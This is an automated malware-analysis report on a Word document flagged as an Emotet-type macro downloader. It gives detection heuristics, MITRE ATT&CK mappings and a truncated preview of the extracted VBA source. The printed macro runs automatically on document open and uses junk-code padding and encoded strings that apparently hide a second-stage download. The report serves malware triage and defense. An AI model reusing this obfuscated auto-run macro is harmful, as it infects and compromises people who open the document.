MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a suspicious 'macros.bas' file further indicate malicious intent. The VBA script appears to download and execute a second-stage payload, as evidenced by the obfuscated strings that likely represent URLs or commands.
Heuristics 6
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46023 bytes |
SHA-256: 1c3083047430461a2c05e6a6aa8a0809e8b586273af2e96b025d661f0bf0f9aa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 17 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bBAVUFGFJp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
rnfBp _
= ChrB(11 / Log(89434) / 57143 _
+ 7254)
WGRIsW = 33200 _
/ CBool(VAItm) / 74 + CSng(PwRoI) - _
(imsOk * UTfFL)
Application.Run GvtmNd + "EINaiskAWpCGdB" + IOWWSw, BTmtiG + KSXSdzQwaVm + tPjOC
iCzsP _
= ChrB(78081 / Log(63424) / 75251 _
+ 82824)
djnJz = 93106 _
/ CBool(PZQmM) / 74 + CSng(hlWFG) - _
(fJYKF * GQdHi)
End Sub
Attribute VB_Name = "LKBIKvzVw"
Sub TomlR(QGtja)
LIFYhI _
= ChrB(86471 / Log(61980) / 58392 _
+ 16287)
waCzYb = 51359 _
/ CBool(kQYpj) / 74 + CSng(TiFzX) - _
(uqkwt * lOodQ)
End Sub
Function KSXSdzQwaVm()
On Error Resume Next
FmNZud _
= ChrB(52002 / Log(66455) / 42378 _
+ 51364)
hKGGws = 41707 _
/ CBool(YiNVE) / 74 + CSng(abblsP) - _
(HAYTnu * cWJiQ)
wcRtZOj = dAzzm("V8LgA3AGEANABhADAANAA4AGQAZQAwAGQAZgAwAs0Qa", RqriCN - RqriCN + 4 + RqriCN - RqriCN, RqriCN - RqriCN + 35 + RqriCN - RqriCN)
UfJsr _
= ChrB(98926 / Log(95153) / 22224 _
+ 27831)
sRJjT = 3415 _
/ CBool(zdKtaJ) / 74 + CSng(nKwwsB) - _
(jEDWv * jtsSh)
jzumq _
= ChrB(88483 / Log(52290) / 95227 _
+ 896)
iwJnIb = 49431 _
/ CBool(TlBPcP) / 74 + CSng(NcGNz) - _
(wbOPk * TRVlzM)
KZtDSP = dAzzm("v6ADMAZABlADcAZQBjADQANQBkAGMAOQBkAGUAMwBmADEANwBjADMANAA0ADUAMgAxAGEANQAzADEAMQBhAGUANgBkAGQAMQAyADAAYQA5ADQAOQA1ADkAYQBhAGYAMwA5ADgAOAAwAGUAZgA2ADIANwAwADAAZABlADMAYwBlADAAMQBlAGMANAA4ADEAYQA2ADgAljo2LEJ", kjCdLF - kjCdLF + 3 + kjCdLF - kjCdLF, kjCdLF - kjCdLF + 196 + kjCdLF - kjCdLF)
wWqbC _
= ChrB(49432 / Log(14039) / 79344 _
+ 15077)
IUUiad = 33356 _
/ CBool(jAkhU) / 74 + CSng(XXiGhz) - _
(DCQToX * EnsKo)
ZQGzi _
= ChrB(35375 / Log(83943) / 5954 _
+ 33788)
Ownwu = 11318 _
/ CBool(KFhXo) / 74 + CSng(jEUWzK) - _
(mOimD * AHDVJO)
PoJjl = dAzzm("hIV,iMAAxAGUAZgBmADYAZgA3AGYAZABlAGMAYQBkAGEAZABhAGQANgA1AGIANAAxAGUANgA0ADcAZQAyADUAMABhAGQAMwBhADMAOAA4ADQAOAAwADzD", GvQRso - GvQRso + 6 + GvQRso - GvQRso, GvQRso - GvQRso + 110 + GvQRso - GvQRso)
fGlTbi _
= ChrB(54745 / Log(65021) / 9854 _
+ 19727)
qlfWu = 19295 _
/ CBool(rsOjAR) / 74 + CSng(vzFwH) - _
(XJCFcT * vViVh)
DQYaYl _
= ChrB(59372 / Log(99460) / 13767 _
+ 34561)
Trttr = 99791 _
/ CBool(kKbCPK) / 74 + CSng(WLwOpA) - _
(wTjYL * MnQLW)
XkDdFTHzX = dAzzm("uPSrxADAAOQBlADAAMwA5ADUAMgAxADIAZQA2ADcAOAA1AGIANwAyADQAYwA2AGMANwAxADkAYgBkAGEAMAA4AGQANQA1ADgAZQAwAGMANQAxADEAMgA0AGMANwBhADEAMwA4ADEAYQBmADgAMwAyAGEAZQBiADkAYQA3ADcAOABiADIAOAAw1", SvSPd - SvSPd + 5 + SvSPd - SvSPd, SvSPd - SvSPd + 176 + SvSPd - SvSPd)
sBVJBE _
= ChrB(94613 / Log(10740) / 58348 _
+ 45686)
ABNvB = 51515 _
/ CBool(kSRCXY) / 74 + CSng(UjoRw) - _
(PfnSdB * uKrvk)
TaoqOO _
= ChrB(6454 / Log(56339) / 47076 _
+ 74752)
cwwSoz = 76746 _
/ CBool(Sitdw) / 74 + CSng(aFcjQZ) - _
(dPUSLn * JduowJ)
bNFVjE = dAzzm("ltjr@5AGMANAA4ADIAZgBmAGIAMABjADUAMQA3ADYAZABmAGQAMwBkAGYAMABmADIAZQBkADAAOAA4ADYAOABkADkAZQA2ADAAZAA0AGIAMwA5AGYAYQBiAGQAZQBhAD3p5", zfXzP - zfXzP + 6 + zfXzP - zfXzP, zfXzP - zfXzP + 123 + zfXzP - zfXzP)
jBAbw _
= ChrB(93519 / Log(30561) / 1720 _
+ 23612)
zsrnIb = 94418 _
/ CBool(Nzwhb) / 74 + CSng(cJNtpo) - _
(jmsqE * EUcScD)
iEwJYw _
= ChrB(31441 / Log(68824) / 90653 _
+ 70626)
izuvPm = 7636 _
/ CBool(JkStw) / 74 + CSng(mihhXi) - _
(oIwjb * wsIZin)
LfazjzuZkB = dAzzm("%K7ADcAZAAxADcAZgAxADAANwAzAGEAYwBhADIAZABjADUANwBiAGEANgAyAGUANwAyAGEAOABhAGQANgA5AGIAYgBhADIAMABkADMAZgBmAGQAYQAyADEANQBiAGUAYwAwAGUAMAA0ADAAMABjADAAYgA2ATIQu", VSwnBB - VSwnBB + 4 + VSwnBB - VSwnBB, VSwnBB - VSwnBB + 153 + VSwnBB - VSwnBB)
SVkUtm _
= ChrB(38470 / Log(39820) / 90731 _
+ 12875)
KzhmN = 66788 _
/ CBool(XFTpp) / 74 + CSng(MnDFZB) - _
(kGDIQ * NolKzt)
ulEPi _
= ChrB(69553 / Log(97836) / 37453 _
+ 93868)
HSjaBf = 45656 _
/ CBool(znXwqh) / 74 + CSng(qUZBiw) - _
(qMjFKo * pnljMV)
PcpQjX = dAzzm("lGc,PAGMAZQBjADEANgA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.